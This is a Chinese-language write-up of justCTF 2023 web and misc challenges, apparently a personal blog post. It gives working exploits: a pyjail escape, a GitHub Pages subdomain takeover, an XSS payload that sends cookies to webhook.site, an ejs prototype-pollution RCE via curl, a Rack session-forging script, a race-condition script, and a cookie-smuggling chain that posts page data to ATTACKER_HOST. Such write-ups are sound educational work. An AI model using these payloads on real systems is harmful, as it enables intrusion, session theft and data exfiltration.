justCTF 2023 WriteUps
這周在 TSJ 隊伍中解了些 web 和 misc 的題目。
Misc
ECC for Dummies
這題會隨機生成一些 boolean (cards
),然後給你對那些 boolean 問一些問題 (以 cards[i]
組成的 python expression,用 AST 過濾),但有幾個問題的答案它會刻意給錯誤的結果,所以題目名稱的 ECC 應該是指 Error Correcting Code。
不過這題的 len(cards) == 5
,直接送 0 0 0 0 0
當作答案其實就有 1/32 的機率是對的,直接硬爆即可。
while true; do echo '1\n1\n1\n1\n1\n1\n1\n1\n0 0 0 0 0\n' | nc eccfordummies.nc.jctf.pro 1337 | grep flag; done
# justCTF{S0me7ime$_L0Gic_1s_n0T_B1n4ry_0101}
不過後來發現它 AST 過濾的部分根本沒寫好,最簡單可以直接 breakpoint()
就過了 XD。
ECC not only for Dummies
這題上了 PoW 並修改了一些題目,但 AST 過濾的部分還是沒寫好,所以也是 breakpoint()
就過了 XD。
breakpoint()
open('flag.txt').read()
# justCTF{S4nd_S0metim3s_It$_EvEn_$0lv4ble}
想要正經版的 Error Correcting Code 題目建議參考 WMCTF 的 nanoDiamond(-rev)
PyPlugins
#!/usr/bin/env python3.10
import dis
import os
import sys
import re
import runpy
import py_compile
import requests
PLUGINS_PATH = "/plugins/"
TRUSTED_DOMAINS = [
'blackhat.day',
'veganrecipes.soy',
'fizzbuzz.foo',
]
def banner():
print("1. List known websites")
print("2. List plugins")
print("3. Download plugin")
print("4. Load plugin")
print("5. Exit")
def list_known_websites():
print("great.veganrecipes.soy")
print("uplink.blackhat.day")
print("plugandplay.fizzbuzz.foo")
def list_plugins():
print("Plugins:")
for f in os.listdir(PLUGINS_PATH):
print(f" {f}")
PATH_RE = re.compile(r"^[A-Za-z0-9_]+$")
MAX_SIZE = 4096
def _get_file(url):
with requests.get(url, stream=True) as r:
r.raise_for_status()
chunks = 0
for chunk in r.iter_content(chunk_size=4096):
return chunk
raise Exception("")
def download_plugin():
print("Provide plugin url in a form of A.B.C where A,B,C must be [A-Za-z0-9_]+")
url = input("url: ").strip()
try:
a, b, c = url.split(".")
if not all(PATH_RE.match(x) for x in (a, b, c)):
print("FAIL:",a,b,c)
raise Exception()
except:
print("ERR: Invalid url format. Cannot download plugin.")
return
domain = f"{b}.{c}"
if domain not in TRUSTED_DOMAINS:
print("ERR: Domain not trusted. Aborting.")
return
url = f"https://{a}.{b}.{c}/"
try:
code = _get_file(url).decode()
# Validate plugin code
cobj = test_expr(code, ALLOWED_OPCODES)
# Constants must be strings!
assert all(type(c) in (str, bytes, type(None)) for c in cobj.co_consts)
except Exception as e:
print(f"ERR: Couldnt get plugin or plugin is invalid. Aborting.")
return
# TODO/FIXME: So far our plugins will just print global strings
# We should make it more powerful in the future, but at least it is secure for now
code += '\nx = [i for i in globals().items() if i[0][0]!="_"]\nfor k, v in x: print(f"{k} = {v}")'
with open(f"{PLUGINS_PATH}/{a}_{b}.py", "w") as f:
f.write(code)
### Code copied from Pwntools safeeval lib
# see https://github.com/Gallopsled/pwntools/blob/c72886a9b9/pwnlib/util/safeeval.py#L26-L67
# we did a small modification: we pass 'exec' instead of 'eval' to `compile`
def _get_opcodes(codeobj):
if hasattr(dis, 'get_instructions'):
return [ins.opcode for ins in dis.get_instructions(codeobj)]
i = 0
opcodes = []
s = codeobj.co_code
while i < len(s):
code = six.indexbytes(s, i)
opcodes.append(code)
if code >= dis.HAVE_ARGUMENT:
i += 3
else:
i += 1
return opcodes
def test_expr(expr, allowed_codes):
allowed_codes = [dis.opmap[c] for c in allowed_codes if c in dis.opmap]
try:
c = compile(expr, "", "exec")
except SyntaxError as ex:
print(ex)
raise ValueError("%r is not a valid expression" % expr)
codes = _get_opcodes(c)
for code in codes:
if code not in allowed_codes:
raise ValueError("opcode %s not allowed" % dis.opname[code])
return c
ALLOWED_OPCODES = ["LOAD_CONST", "STORE_NAME", "RETURN_VALUE"]
def load_plugin():
"""
Loads the plugin performing various sanity checks.
A plugin must only define strings in it.
"""
plugin = input("plugin: ").strip()
if not PATH_RE.match(plugin):
print("Invalid plugin name. Aborting.")
return
plugin_path = f"{PLUGINS_PATH}/{plugin}.py"
if not os.path.exists(plugin_path):
print("Path not found: %s" % plugin_path)
return
# We validated the plugin when we downloaded it
# so it must be secure to run it now: it should just print globals.
runpy.run_path(py_compile.compile(plugin_path))
funcs = {
1: list_known_websites,
2: list_plugins,
3: download_plugin,
4: load_plugin,
5: sys.exit
}
def main():
print("Welcome to the PyPlugins challenge!")
print("We will load your Python plugins, but only if they are hosted on a trusted website and if they cannot harm us.")
while True:
banner()
n = input('> ')
try:
n = int(n)
func = funcs[n]
except:
print("Wrong input. Try again")
continue
try:
func()
except Exception as e:
print(f"Faild")
raise
if __name__ == '__main__':
main()
簡單來說這題可以從指定 domain 下載 plugin 並且執行,但是只能執行 LOAD_CONST
, STORE_NAME
, RETURN_VALUE
這三個 opcode,所以類似 pyjail。
首先是要找方法繞 domain 限制,dig 一下那幾個 domain 的 subdomain 會發現它基本上是直接 wildcard CNAME 到 GitHub Pages。
*.blackhat.day
->whateverherebecausewhocares.github.io
*.veganrecipes.soy
->dc3dtest.github.io
*.fizzbuzz.foo
->howdoesthiswork.github.io
所以有機會做 subdomain takeover。
具體方法也很簡單,例如假設我的目標是拿下 maple.blackhat.day
,那就在自己帳號底下建一個 repo 叫 whateverherebecausewhocares.github.io
,然後放一個 CNAME
檔案內容為 maple.blackhat.day
,之後進 repo settings 的 pages 等一下就能 takeover 了。
剩下是 pyjail 的部分,我這邊是注意到它 compile(expr, "", "exec")
的 expr
是 str
,而寫入檔案後再執行時其實是當 bytes
處理的,而 Python 在遇到 bytes
類型的 source code 時是會接受 #coding: ...
這種 comment 的,所以我用這個就繞過了:
#coding: raw_unicode_escape
x='PEKO\u0027\u002b\u0062\u0072\u0065\u0061\u006b\u0070\u006f\u0069\u006e\u0074\u0028\u0029\u002b\u0027'
不過 flag 是 justCTF{GitHub_P4g3s_Subd0ma1ns_And_Z1pp3d_Pycs_Ar3_Cr4zy!}
,所以顯然不是 intended XD。
這題 intended 是個 CPython 0day (?): py/pyc/zip file type confusion
總之就是 python 是能接受 zip file 當作 input 的 (參考 zipapp),裡面的運作原理和一般 zip 解壓縮很像,就是找 zip 的 end of central directory 之類的。另一方面 CPython 還有個 pyc 檔案包含了一些 header 和 code object,而 code object 上又會有 co_consts
的存在。
所以如果你有個 Python 裡面有個很長的 byte literal 包含了一個 zip,它編譯成 pyc 之後會直接在裡面展開,而此時去執行它的時候 CPython 反而是會因為那個 zip signature 而把它誤認成 zip 來執行。其他的說明可以參考這個。
Python Zip confusion: POC
Web
eXtra Safe Security layers
這題核心部分是這段 code:
app.use((req, res, next) => {
if (req.query) {
// Saferty layer 2
const s = JSON.stringify(req.query).toLowerCase();
for (const b of blacklist) {
if (s.includes(b.toLowerCase())) {
return res.status(403).send("You are not allowed to do that.");
}
}
// Safety layer 3
for (const c of s) {
if (c.charCodeAt(0) > 127 || c.charCodeAt(0) < 32) {
return res.status(403).send("You are not allowed to do that.");
}
}
}
if (req.cookies?.admin === adminCookie) {
res.user = {
isAdmin: true,
text: "Welcome back :)",
unmodifiable: {
background: "admin_background.png",
CSP: `default-src 'self'; img-src 'self'; style-src '${css}'; script-src '${adminJs}' '${commonJs}';`,
},
};
} else {
// Safety layer 4
res.user = {
text: "Hi! You can modify this text by visiting `?text=Hi`. But I must warn you... you can't have html tags in your text.",
unmodifiable: {
background: "background.png",
},
};
}
if (req.query.text) {
res.user = { ...res.user, ...req.query };
}
// Safety layer 5
res.set("Content-Security-Policy", res.user.unmodifiable.CSP ?? defaultCSP);
next();
});
還有 ejs template 部分有這個:
<script>
// load background...
main.innerHTML += `
<img class='background' src='<%- unmodifiable?.background %>'>
`;
console.log('Loaded!');
</script>
blacklist
部分就一些常見的 js function 如 alert
eval
之類的,很好繞,之後最主要的關鍵是 res.user = { ...res.user, ...req.query }
,這邊可以用 query string 造 object 去蓋過 unmodifiable
的部分,這樣就能改 CSP
和 background
,而 background
直接 code injection 即可。
http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(%27https://webhook.site/XXXXX?%27%2Bdocument.cookie);`
Dangerous
require "sinatra"
require "sqlite3"
require "erubi"
require "digest"
require "json"
config = JSON.parse(File.read("./config.json"))
set :bind, '0.0.0.0'
enable :sessions
set :erb, :escape_html => true
con = SQLite3::Database.new "sqlite.db"
con.execute "CREATE TABLE IF NOT EXISTS threads(
id INTEGER PRIMARY KEY AUTOINCREMENT,
content TEXT,
ip TEXT,
username TEXT
);"
con.execute "CREATE TABLE IF NOT EXISTS replies(
id INTEGER PRIMARY KEY AUTOINCREMENT,
content TEXT,
ip TEXT,
username TEXT,
thread_id INTEGER
);"
def get_threads(con)
return con.execute("SELECT * FROM threads ORDER BY id DESC;")
end
def get_replies(con, id)
return con.execute("SELECT *, null, 0 as p FROM threads WHERE id=?
UNION SELECT *, 1 as p FROM replies WHERE thread_id=? order by p", [id, id])
end
def is_allowed_ip(username, ip, config)
return config["mods"].any? {
|mod| mod["username"] == username and mod["allowed_ip"] == ip
}
end
get "/" do
@threads = get_threads(con)
erb :index
end
post "/thread" do
if params[:content].nil? or params[:content] == "" then
raise "Thread content cannot be empty!"
end
if session[:username] then
username = is_allowed_ip(session[:username], request.ip, config) ? session[:username] : nil
end
# === temporarily disabled ===
# con.execute("INSERT INTO threads (id, content, ip, username)
# VALUES (?, ?, ?, ?)", [nil, params[:content], request.ip, username])
redirect to("/#{con.execute('SELECT last_insert_rowid()')[0][0]}")
end
get "/flag" do
if !session[:username] then
erb :login
elsif !is_allowed_ip(session[:username], request.ip, config) then
return [403, "You are connecting from untrusted IP!"]
else
return config["flag"]
end
end
post "/login" do
if config["mods"].any? {
|mod| mod["username"] == params[:username] and mod["password"] == params[:password]
} then
session[:username] = params[:username]
redirect to("/flag")
else
return [403, "Incorrect credentials"]
end
end
get "/:id" do
@id = params[:id]
@replies = get_replies(con, @id)
erb :thread
end
post "/:id" do
if params[:content].nil? or params[:content] == "" then
raise "Reply content cannot be empty!"
end
if session[:username] then
username = is_allowed_ip(session[:username], request.ip, config) ? session[:username] : nil
end
@id = params[:id]
# === temporarily disabled ===
# con.execute("INSERT INTO replies (id, content, ip, username, thread_id)
# VALUES (?, ?, ?, ?, ?)", [nil, params[:content], request.ip, username, @id])
redirect to("/#{@id}")
end
ruby 題,跑的時候是直接 ruby dangerous.rb
執行的。直接用空 content POST /thread
會有 error page,可發現它是跑在 debug mode 下的,所以能在頁面上找到 session secret。
有 session secret 就代表能隨意修改 cookie,而它底層是用 ruby Marshal.load
去反序列化的。不過在這個 Ruby 3.2 版本中我用 Google 查到的 payload 都沒有成功,所以就只有拿它來修改 session[:username]
而已。
從它給的網站上可知 admin 的 username 是 janitor
,另外還有兩個 thread 都有 admin 的留言,而 thread.erb
裡面有:
<% @replies.each do |reply| %>
<div style="padding-bottom: 1rem">
<% user_color = Digest::SHA256.hexdigest(reply[2] + @id).slice(0, 6) %>
<div style="color: #<%= user_color %>;">
<%= user_color %>
<% if reply[3] %>
<span style="color: #ff0000;">##Admin:<%= reply[3] %>##</span>
<% end %>
</div>
<div><%= reply[1] %></div>
</div>
<% end %>
所以可以知道 sha256(admin_ip + '1')[:6]
和 sha256(admin_ip + '2')[:6]
,而 ipv4 空間不大所以可以直接爆:
from hashlib import sha256
from concurrent.futures import ProcessPoolExecutor
def task(a):
print(f"{a} started")
for b in range(256):
for c in range(256):
for d in range(256):
ip = f"{a}.{b}.{c}.{d}"
h1 = sha256((ip + "1").encode()).hexdigest()[:6]
h2 = sha256((ip + "2").encode()).hexdigest()[:6]
if h1 == "32cae2" and h2 == "92e1e8":
print(ip)
with ProcessPoolExecutor(max_workers=8) as executor:
for a in range(256):
executor.submit(task, a)
最後得到的 ip 是 10.24.170.69
,所以改 session 然後用 X-Forwarded-For
偽造 ip 就能拿到 flag 了。
import hashlib, hmac, base64
from urllib.parse import quote, unquote
from Crypto.Cipher import AES
from subprocess import check_output
import requests
import os
sess = unquote(requests.get("http://dangerous.web.jctf.pro/flag").cookies["rack.session"])
print(sess)
secret = "a9316e61bc75029d52f915823d7bb628a4adae8b174bce89fd38ec4c7fb925a07e2ccbc01572b9fdce56502ef5d02609e5194a5ddd649ff349a206002e96a99d"
key = bytes.fromhex(secret)[:32]
ct, iv, auth = map(base64.b64decode, sess.split("--"))
cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
hh = cipher.decrypt_and_verify(ct, auth).hex()
out = check_output(
["ruby"],
input=f"""
hex_data = "{hh}"
data = [hex_data].pack("H*")
r = Marshal.load(data)
puts r
r["username"] = "janitor"
puts r
puts Marshal.dump(r).unpack("H*")[0]
""".encode(),
).decode()
print(out)
pt = bytes.fromhex(out.split("\n")[-2])
iv = os.urandom(len(iv))
cipher = AES.new(key, AES.MODE_GCM, nonce=iv)
ct, auth = cipher.encrypt_and_digest(pt)
sess = b"--".join(map(base64.b64encode, [ct, iv, auth])).decode()
print(sess)
r = requests.get(
"http://dangerous.web.jctf.pro/flag",
cookies={"rack.session": quote(sess)},
headers={"X-Forwarded-For": "10.24.170.69"},
)
print(r.text)
# justCTF{1_th1nk_4l1ce_R4bb1t_m1ght_4_4_d0g}
Perfect Product
這題用 ejs 3.1.9,而核心部分 code 是:
app.all('/product', (req, res) => {
const params = req.query || {};
Object.assign(params, req.body || {});
let name = params.name
let strings = params.v;
if(!(strings instanceof Array) && !Array.isArray(strings)){
strings = ['NaN', 'NaN', 'NaN', 'NaN', 'NaN'];
}
// make _0 to point to all strings, copy to prevent reference.
strings.unshift(Array.from(strings));
const data = {};
for(const idx in strings){
data[`_${idx}`] = strings[idx];
}
if(typeof name !== 'string'){
name = `Product: NaN`;
}else{
name = `Product: ${name}`;
}
data['productname'] = name;
data['print'] = !!params.print;
res.render('product', data);
});
顯然這題的目標是要透過 data 去修改 ejs 的設定,然後弄 code injection 拿 RCE。
參考這個可知我們需要能讓 data.settings
有東西才行,不過單看 code 會覺得是不可能的。不過把 js 的 prorotype 機制加進來考慮的話會發現其實能汙染到 data.__proto__.settings
也是可以的,所以找辦法讓 strings
不是 array 才行。
要繞過那個 assignment 的一個簡單方法是讓 strings instanceof Array
為 true
,而 js 中 { __proto__: [] } instanceof Array
是成立的,所以用 ?v[__proto__][0]&v[_proto__][x]=0
就能讓 data.__proto__.x === '0'
了。
接下來我嘗試使用這個的 payload,但發現它 code injection 很麻煩,需要讓 options 的 payload 和 ejs 的部分內容一致才能做到。不過此時我突然想起不久前打 FCSC 2023 時也有一題類似的題目也是一樣要透過 ejs settings 去 RCE 的,當時我就有找到這個 gadget:
const payload = {
settings: {
'view options': {
debug: true,
client: true,
escapeFunction: '(() => {});return process.mainModule.require("child_process").execSync("cat /app/flag*").toString()'
}
}
}
其他人的 writeup (法文): FCSC 2023 : Peculiar Caterpillar
而且當時的版本也是 ejs 3.1.9,所以直接拿來用就行了:
curl -H 'Content-Type: application/json' -g 'http://sy0rdzpzb0mexasqml3bzv9tqtgqo3.perfectproduct.web.jctf.pro/product?v[__proto__][0]&v[2]=1&v[3]=1&v[4]=1' -G --data-urlencode 'v[_proto__][settings][view%20options][debug]=true' --data-urlencode 'v[_proto__][settings][view%20options][client]=true' --data-urlencode 'v[_proto__][settings][view%20options][escapeFunction]=(() => {});return process.mainModule.require("child_process").execSync("/readflag").toString()' --data-urlencode 'v[_proto__][cache]='
# justCTF{found_the_bug_myself_but_i_guess_people_like_to_report_0days_publicly}
還有這種 bug (?) 其實現在 ejs 已經說這不算是 bug 了: Out-of-Scope Vulnerabilities,所以不用修的樣子。
Aquatic Delights
#!/usr/bin/env python
import flask
import json
import sqlite3
from os import getenv
app = flask.Flask(__name__, static_url_path='/static')
DATABASE = None
def database_connection(func):
def wrapper(self, *args, **kwargs):
with sqlite3.connect('/tmp/shop.db') as con:
if hasattr(self, 'locked') and self.locked:
return flask.jsonify({'result': 'NG', 'reason': 'Database is locked!'}), 500
try:
return func(self, con.cursor(), *args, **kwargs)
except Database.Error as ex:
return flask.jsonify({'result': 'NG', 'reason': str(ex)}), 500
except:
return flask.abort(500, 'Something went wrong')
return wrapper
def database_lock(func):
def wrapper(self, *args, **kwargs):
try:
self.locked = True
result = func(self, *args, **kwargs)
except:
raise
finally:
self.locked = False
return result
return wrapper
class Database(object):
@database_connection
def __init__(self, cur):
self.just_coins = 10
cur.execute("DROP TABLE IF EXISTS shop")
cur.execute("CREATE TABLE shop(name, price, available)")
shop_data = [
('Catfish', 1, 10),
('Rainbow Guppy', 5, 5),
('Koi Carp', 20, 3),
('Royal Angelfish', 100, 1),
('Flagfish', 1337, 1)
]
cur.executemany("INSERT INTO shop(name, price, available) VALUES(?, ?, ?)", shop_data)
cur.execute("DROP TABLE IF EXISTS inventory")
cur.execute("CREATE TABLE inventory(name, available)")
cur.executemany("INSERT INTO inventory(name, available) VALUES(?, ?)",
[
(name, 0) for name, _, _ in shop_data
]
)
def _get_shop(self, cur, name=None):
if name is None:
return {x[0]: x[1:] for x in cur.execute("SELECT * FROM shop")}
else:
cur.execute("SELECT price, available FROM shop WHERE name = ?", (name,))
return cur.fetchone()
def _get_inventory(self, cur, name=None):
if name is None:
return {x[0]: x[1] for x in cur.execute("SELECT * FROM inventory")}
else:
cur.execute("SELECT available FROM inventory WHERE name = ?", (name,))
return cur.fetchone()[0]
def _update_shop(self, cur, name, available):
cur.execute("UPDATE shop SET available = ? WHERE name = ?", (available, name))
def _update_inventory(self, cur, name, available):
cur.execute("UPDATE inventory SET available = ? WHERE name = ?", (available, name))
def _get_shop_data(self, cur):
data = {}
shop = self._get_shop(cur)
inventory = self._get_inventory(cur)
for name, item in shop.items():
data[name.replace(' ', '_')] = {
'price': item[0],
'available': item[1],
'eat': inventory.get(name)
}
return data
class Error(Exception):
pass
@database_connection
@database_lock
def buy(self, cur, name, amount):
shop_price, shop_available = self._get_shop(cur, name)
inv_available = self._get_inventory(cur, name)
if shop_available == 0: raise Database.Error('There is no more item of this type in shop')
if amount <= 0 or amount > 0xffffffff: raise Database.Error('Invalid amount')
if shop_available < amount: raise Database.Error('Not enough items in shop')
total_price = shop_price * amount
if total_price > self.just_coins: raise Database.Error('Not enough justCoins')
self.just_coins -= total_price
self._update_inventory(cur, name, inv_available + amount)
self._update_shop(cur, name, shop_available - amount)
return flask.jsonify({'result': 'OK', 'response': f'Successfully bought {amount} {name}',
'justCoins': DATABASE.just_coins, 'data': self._get_shop_data(cur)})
@database_connection
@database_lock
def sell(self, cur, name, amount):
inv_available = self._get_inventory(cur, name)
if inv_available < amount: raise Database.Error('Not enough items in inventory')
if amount <= 0 or amount > 0xffffffff: raise Database.Error('Invalid amount')
shop_price, shop_available = self._get_shop(cur, name)
total_price = shop_price * amount
self.just_coins += total_price
self._update_inventory(cur, name, inv_available - amount)
self._update_shop(cur, name, shop_available + amount)
return flask.jsonify({'result': 'OK', 'response': f'Successfully sold {amount} {name}',
'justCoins': DATABASE.just_coins, 'data': self._get_shop_data(cur)})
@database_connection
def eat(self, cur, name):
inv_available = self._get_inventory(cur, name)
if inv_available <= 0: raise Database.Error('Not enough items in inventory')
self._update_inventory(cur, name, inv_available - 1)
if name == 'Flagfish':
response = getenv("FLAG")
else:
response = 'Nothing happened'
return flask.jsonify({'result': 'OK', 'response': response, 'justCoins': DATABASE.just_coins,
'data': self._get_shop_data(cur)})
@database_connection
def get_table(self, cur):
return flask.render_template('table.html', inv=DATABASE._get_inventory(cur), shop=DATABASE._get_shop(cur))
@database_connection
def get_inventory(self, cur=None):
return self._get_inventory(cur)
@database_connection
def get_shop(self, cur=None):
return self._get_shop(cur)
@app.route('/', methods=['GET'])
def index():
return flask.render_template('index.html', just_coins=DATABASE.just_coins, inv=DATABASE.get_inventory(), shop=DATABASE.get_shop())
@app.route('/api/buy', methods=['POST'])
def api_buy():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
assert isinstance(data['amount'], int)
except:
return flask.abort(400, 'Invalid request')
return DATABASE.buy(data['name'], data['amount'])
@app.route('/api/sell', methods=['POST'])
def api_sell():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
assert isinstance(data['amount'], int)
except:
return flask.abort(400, 'Invalid request')
return DATABASE.sell(data['name'], data['amount'])
@app.route('/api/eat', methods=['POST'])
def api_eat():
try:
data = json.loads(flask.request.data)
assert isinstance(data['name'], str)
except:
return flask.abort(400, 'Invalid request')
return DATABASE.eat(data['name'])
@app.route('/reset', methods=['GET'])
def reset():
DATABASE.__init__()
return flask.redirect("/")
if __name__ == '__main__':
DATABASE = Database()
app.run(host="0.0.0.0", port=8080)
很標準的 shop app,不過 buy sell 都有上 database lock,所以理論上不應該有 race condition。
不過我把 database_connection
稍微修改一下紀錄當前 entry 的次數方法它其實沒有很好的 lock 住 database:
def database_connection(func):
def wrapper(self, *args, **kwargs):
if getattr(self, 'entry', None) is None:
self.entry = 0
with sqlite3.connect('/tmp/shop.db') as con:
if hasattr(self, 'locked') and self.locked:
return flask.jsonify({'result': 'NG', 'reason': 'Database is locked!'}), 500
try:
self.entry += 1
import sys
print(self.entry, file=sys.stderr)
return func(self, con.cursor(), *args, **kwargs)
except Database.Error as ex:
return flask.jsonify({'result': 'NG', 'reason': str(ex)}), 500
except:
return flask.abort(500, 'Something went wrong')
finally:
self.entry -= 1
return wrapper
因為其實有可能有多個 request 同時都在 database_connection
和 database_lock
中間過渡的過程,所以直接硬 spam 還是有機會 race 成功的,只是比沒 lock 的版本比起來機率比較低而已。
所以就寫個腳本硬 race,而 sell 的次數應該要比 buy 多這樣錢就會增加:
import requests
from threading import Thread
# host = "http://localhost:8080"
host = "http://lcy5kjz4es4502p3acpac6czn5t4gs.aquatic-sgp1.web.jctf.pro"
def buy(name, amount):
try:
return requests.post(
host + "/api/buy", json={"name": name, "amount": amount}
).json()
except:
pass
def sell(name, amount):
try:
return requests.post(
host + "/api/sell", json={"name": name, "amount": amount}
).json()
except:
pass
def eat(name):
try:
return requests.post(host + "/api/eat", json={"name": name}).json()
except:
pass
def reset():
requests.get(host + "/reset", allow_redirects=False).text
def main():
# tune this according to current total coins
# cur = ("Catfish", 10)
# cur = ("Rainbow Guppy", 3)
# cur = ("Koi Carp", 8)
cur = ("Royal Angelfish", 4)
def bb():
r = buy(*cur)
if r is not None and "justCoins" in r:
tot = r["justCoins"]
for name, d in r["data"].items():
tot += d["price"] * d["eat"]
print("b", r["justCoins"], tot)
def ss():
r = sell(*cur)
if r is not None and "justCoins" in r:
tot = r["justCoins"]
for name, d in r["data"].items():
tot += d["price"] * d["eat"]
print("s", r["justCoins"], tot)
while True:
Thread(target=bb).start()
Thread(target=ss).start()
Thread(target=ss).start()
Thread(target=ss).start()
main()
# justCTF{r4c3_w1nn3r_w1nn3r_ch1ck3n_d1nn3r!}
Phantom
這題有很簡單的帳號註冊系統,然後登入後可以修改自己的 name 和 description,而 flag 在 admin bot 的 name 中。
其中 description 會經過這個過濾:
func isSafeHTML(input string) bool {
var buffer bytes.Buffer
tokenizer := html.NewTokenizer(strings.NewReader(input))
for {
tt := tokenizer.Next()
switch {
case tt == html.ErrorToken:
return true
case tt == html.StartTagToken, tt == html.EndTagToken, tt == html.SelfClosingTagToken:
token := tokenizer.Token()
if len(token.Attr) > 0 {
return false
}
switch token.Data {
case "h1", "h2", "h3", "h4", "h5", "h6", "b", "i", "a", "img", "p", "code", "svg", "textarea":
buffer.WriteString(token.String())
default:
return false
}
case tt == html.TextToken:
buffer.WriteString(tokenizer.Token().String())
default:
return false
}
}
}
看到 <svg>
就讓我想到能到因為 <svg>
裡面的 parsing 模式是類似 xml 的,而 <textarea>
內部的內容是不用經過 escape 的 (RCDATA state)。所以 <svg><textarea></svg><script>...
理論上應該是能過的,測試一下也真的可以。
我之所以知道這個是因為不久前我也在 Joplin 中找到了一個很類似的 XSS
剩下就是要怎麼透過繞過 CSRF 去 login 或是修改 profile 了,直接看 code 會發現 profileEdit
(/profile/edit
) 有點特別:
func profileEditHandler(w http.ResponseWriter, r *http.Request) {
if r.Method == http.MethodGet {
session, _ := store.Get(r, "session")
if auth, ok := session.Values["authenticated"].(bool); !ok || !auth {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
username := session.Values["username"].(string)
if user, ok := Users[username]; ok {
data := map[string]interface{}{
"User": user,
"csrfToken": csrf.Token(r),
}
templates.ExecuteTemplate(w, "edit", data)
} else {
http.Error(w, "Unauthenticated", http.StatusUnauthorized)
return
}
} else {
// handle file upload
session, _ := store.Get(r, "session")
if auth, ok := session.Values["authenticated"].(bool); !ok || !auth {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
name := r.FormValue("name")
description := r.FormValue("description")
username := session.Values["username"].(string)
if user, ok := Users[username]; ok {
if isSafeHTML(description) {
descriptionHTML, err := html.Parse(strings.NewReader(description))
var buf bytes.Buffer
html.Render(&buf, descriptionHTML)
if err != nil {
http.Error(w, "Forbidden", http.StatusForbidden)
}
if len(name) > 0 {
user.Name = name
}
user.Description = buf.String()
data := map[string]interface{}{
"Name": user.Name,
"Description": template.HTML(user.Description),
}
templates.ExecuteTemplate(w, "profile", data)
} else {
http.Error(w, "Forbidden", http.StatusForbidden)
return
}
}
}
}
最主要的不同點在於它判斷 method 的地方用了 else,和其他幾個 handler 中的做法不同: } else if r.Method == http.MethodPost {
。直接參考 csrf.go 也能知道 GET
, HEAD
, OPTIONS
, TRACE
這幾個 method 都不會被檢查 csrf token,所以可以透過這幾個 method 並同時送 body 就能成功修改,用 curl 也確定能成功。
然而我找不到方法用 fetch 或是 form 在送 GET
HEAD
request 也能帶 body 的方法,所以就放棄了這條路。
我是改用了 http://xssl.web.jctf.pro
這個 domain 和 https://phantom.web.jctf.pro
屬於 same site 的關係,所以我可從 xssl.web.jctf.pro
改 cookie。
不過 document.cookie = 'session=... ;path=/profile; domain=web.jctf.pro'
因為某些未知原因起不了作用,我猜大概是因為原本的 cookie 是 Secure
或是 HttpOnly
的所以它不給你改。不過幸好我不久前有看到 Cookie Bugs - Smuggling & Injection 這篇文章,從裡面學到了 document.cookie = '=a=b'
在瀏覽器中是個 (key, value) = ('', 'a=b')
的 cookie,而它被 serialize 到 Cookie
header 時會變成 Cookie: a=b
(注意 key 和 value 中間的等號不見了)。這個在 Go 的 cookie parsing algorithm 眼中會是一個 (key, value) = ('a', 'b')
的 cookie,所以透過這個方法就能成功改 session cookie 了。
<script>
const samesiteXSS =
'http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(name);`'
// prepare an account with the following xss payload as description
// <svg><textarea></svg><script>fetch('/profile%2fedit').then(r=>r.text()).then(t=>fetch('https://ATTACKER_HOST/report',{method:'POST',body:t,mode:'no-cors'}))< /script>
// the `%2f` in `/profile%2fedit` is needed or browser will use our provided XSS account session to request it, which doesn't have the flag
// playing with window/iframe references should work too
window.name =
'javascript:' +
encodeURIComponent(`
document.cookie = '=session=MTY4NTg2ODU0OXxEdi1CQkFFQ180SUFBUkFCRUFBQVRQLUNBQUlHYzNSeWFXNW5EQThBRFdGMWRHaGxiblJwWTJGMFpXUUVZbTl2YkFJQ0FBRUdjM1J5YVc1bkRBb0FDSFZ6WlhKdVlXMWxCbk4wY21sdVp3d0xBQWx6ZFhCbGNtNWxibVU9fNgFpBvKntkK07FH7_Zcu0zSesy10P01b20weA_MIt_p;domain=web.jctf.pro;path=/profile'
location = 'https://phantom.web.jctf.pro/profile'
`)
location = samesiteXSS
// justCTF{why_on_earth_does_my_app_handle_HEADs}
</script>
另外是我賽後才知道其實 r.FormValue(key)
其實也會從 query string 讀取,所以 CSRF 其實直接 HEAD /profile/edit?name=&description=XSS
就行了。